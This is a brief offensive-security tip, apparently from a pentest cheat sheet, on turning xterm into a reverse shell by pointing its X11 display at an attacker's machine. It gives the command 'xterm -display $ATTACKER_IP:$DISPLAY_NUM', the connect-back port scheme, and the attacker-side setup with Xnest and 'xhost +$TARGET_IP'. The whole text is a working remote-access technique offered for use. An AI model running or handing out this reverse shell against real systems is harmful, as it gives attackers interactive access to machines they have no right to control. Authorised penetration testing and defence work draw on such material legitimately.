Exploiting Xterm

Remember that the X11 protocol is network based! You can thus get xterm to act as a reverse shell by simply providing it with a display pointing to your machine.

xterm -display $ATTACKER_IP:$DISPLAY_NUM

The connection will be made back on port 6000 + $DISPLAY_NUM (so, 6000 for display 0, 6001 for display 1, etc.).

This, of course, requires a running X server on your end (for example, Xnest :1). You’ll need to make sure that connections from the target system are authrized.

xhost +$TARGET_IP